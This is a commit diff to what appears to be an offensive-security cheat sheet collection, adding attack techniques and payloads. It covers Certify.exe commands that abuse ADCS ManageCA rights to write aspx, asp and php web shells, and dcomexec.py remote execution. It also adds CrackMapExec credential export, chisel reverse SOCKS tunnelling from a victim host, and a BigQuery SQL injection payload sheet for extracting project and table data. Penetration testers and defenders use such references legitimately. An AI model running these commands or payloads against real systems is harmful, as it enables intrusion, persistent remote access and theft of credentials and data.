ADCS ESC7 Shell + Big Query SQL

Methodology and Resources/Active Directory Attack.md

@@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox
 Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
 ```
 
-You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
+You can add some custom queries like :
+* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
+* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
+* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
+
+Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
 
 
 ### Using PowerView
@@ -2302,6 +2307,22 @@ Exploitation:
     Certify.exe setconfig /removeapproval /restart
     ```
 
+Alternative exploitation from **ManageCA** to **RCE** on ADCS server: 
+
+```ps1
+# Get the current CDP list. Useful to find remote writable shares:
+Certify.exe writefile /ca:SERVER\ca-name /readonly
+
+# Write an aspx shell to a local web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
+
+# Write the default asp shell to a local web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
+
+# Write a php shell to a remote web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
+```
+
 
 #### ESC8 - AD CS Relay Attack
 
@@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38
 > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
 
 
-* Impacket DcomExec.py
+* Impacket DCOMExec.py
   ```ps1
   dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
   dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
   dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
+
+  python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
+  # -object MMC20 specifies that we wish to instantiate the MMC20.Application object.
+  # -silentcommand executes the command without attempting to retrieve the output.
   ```
 * CheeseTools - https://github.com/klezVirus/CheeseTools
   ```powershell
@@ -3493,4 +3518,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
 * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
 * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
-* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
+* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
+* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)

Methodology and Resources/Miscellaneous - Tricks.md

@@ -14,4 +14,14 @@ $ wall "Stop messing with the XXX service !"
 $ wall -n "System will go down for 2 hours maintenance at 13:00 PM"  # "-n" only for root
 $ who
 $ write root pts/2	# press Ctrl+D  after typing the message. 
+```
+
+## CrackMapExec Credential Database
+
+```ps1
+cmedb (default) > workspace create test
+cmedb (test) > workspace default
+cmedb (test) > proto smb
+cmedb (test)(smb) > creds
+cmedb (test)(smb) > export creds csv /tmp/creds
 ```

Methodology and Resources/Network Pivoting Techniques.md

@@ -8,7 +8,7 @@
   * [Local Port Forwarding](#local-port-forwarding)
   * [Remote Port Forwarding](#remote-port-forwarding)
 * [Proxychains](#proxychains)
-* [Graphtcp](#graphtcp)
+* [Graftcp](#graftcp)
 * [Web SOCKS - reGeorg](#web-socks---regeorg)
 * [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
 * [Metasploit](#metasploit)
@@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
 go get -v github.com/jpillora/chisel
 
 # forward port 389 and 88 to hacker computer
-user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
+user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
+
+# SOCKS
+user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks
 ```
 
 ### SharpChisel

SQL Injection/BigQuery Injection.md

@@ -0,0 +1,70 @@
+# Google BigQuery SQL Injection 
+
+## Summary
+
+* [Detection](#detection)
+* [BigQuery Comment](#bigquery-comment)
+* [BigQuery Union Based](#bigquery-union-based)
+* [BigQuery Error Based](#bigquery-error-based)
+* [BigQuery Boolean Based](#bigquery-boolean-based)
+* [BigQuery Time Based](#bigquery-time-based)
+* [References](#references)
+
+## Detection
+
+* Use a classic single quote to trigger an error: `'`
+* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
+
+```ps1
+# Gathering project id
+select @@project_id
+
+# Gathering all dataset names
+select schema_name from INFORMATION_SCHEMA.SCHEMATA
+
+# Gathering data from specific project id & dataset
+select * from `project_id.dataset_name.table_name`
+```
+
+## BigQuery Comment
+
+```ps1
+select 1#from here it is not working
+select 1/*between those it is not working*/
+```
+
+## BigQuery Union Based
+
+```ps1
+UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
+```
+
+## BigQuery Error Based
+
+```ps1
+# Error based - division by zero
+' OR if(1/(length((select('a')))-1)=1,true,false) OR '
+
+# Error based - casting: select CAST(@@project_id AS INT64)
+dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
+```
+
+## BigQuery Boolean Based
+
+```ps1
+' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
+```
+
+## BigQuery Time Based
+
+* Time based functions does not exist in the BigQuery syntax.
+
+## References
+
+* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
+* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
+* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
+* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)